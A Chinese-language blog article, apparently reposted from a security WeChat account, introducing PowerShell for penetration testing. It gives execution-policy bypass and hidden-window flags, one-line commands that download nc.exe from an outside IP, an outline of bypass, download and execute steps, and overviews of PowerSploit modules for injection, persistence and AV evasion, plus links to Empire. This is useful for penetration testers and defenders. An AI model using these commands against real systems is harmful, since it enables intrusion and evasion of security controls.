前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >浅谈PowerShell在渗透测试中的应用

浅谈PowerShell在渗透测试中的应用

作者头像
HACK学习
发布2019-08-07 14:43:14
2K0
发布2019-08-07 14:43:14
举报
文章被收录于专栏:HACK学习

0x01 PowerShell简介

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

代码运行在内存中可以不去接触磁盘 很多安全产品并不能监测到powershell的活动 cmd.exe通常被阻止运行,但是powershell不会。

0x02 常用命令及一般攻击方式

-WindowsStyle Hidden 隐藏自己的窗口

-ExecutionPolicy Bypass 绕过策略

Get-Content .runme.ps1 | PowerShell.exe -noprofile -

其他绕过策略

http://www.freebuf.com/articles/system/93829.html

查看策略

Get-ExecutionPolicy

显示PowerShell版本

Get-Host或者$PSVersionTable.PSVersion

Win 7 PowerShell WebClient:

(New-Object System.Net.WebClient).DownloadFile("http://10.0.0.10/nc.exe","nc.exe")

Win 8及更高版本PowerShell Invoke-WebRequest (wget):

wget "http://10.0.0.10/nc.exe" -outfile "nc.exe"

获取帮助

get-help

进程相关

start-process

get-process

stop-process(kill)

ps

一般利用步骤

绕过相关策略->下载相应脚本->执行脚本->(其他脚本下载执行利用)

0x03 PowerSploit

PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。

项目地址:https://github.com/PowerShellMafia/PowerSploit

脚本列表

一、代码执行(CodeExecution)

1. Invoke-DllInjection*

2. Invoke-ReflectivePEInjection

3. Invoke-Shellcode

4. Invoke-WmiCommand

二、脚本修改(ScriptModification)

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

三、权限维持(Persistence)

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

四、绕过杀毒软件(AntivirusBypass)

Find-AVSignature

五、信息收集(Exfiltration)

这个文件夹主要是收集目标主机上的信息。

六、信息侦察(Recon)

这个文件夹主要是以目标主机为跳板进行内网主机侦察。

具体利用

https://xz.aliyun.com/t/263

https://www.secpulse.com/archives/55893.html

0x04 Empire

Empire:PowerShell后期漏洞利用代理工具

不多说 给两个链接 实战中有时候比msf更好用

http://www.freebuf.com/articles/web/76892.html

https://github.com/EmpireProject/Empire

0x05 其它姿势

http://www.freebuf.com/sectool/90362.html

http://www.freebuf.com/articles/system/133640.html

看了很多国外的内网渗透权限维持和免杀后,发现powershell做对抗的难度已提升了

国外大牛们已经开始在研究.net以及C#的代码,进行绕过和长久控制

感兴趣的可以多研究下C#和.net编程哦,未来一段时间里的发展方向

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-11-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x02 常用命令及一般攻击方式
  • 0x03 PowerSploit
  • 0x04 Empire
  • 0x05 其它姿势
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档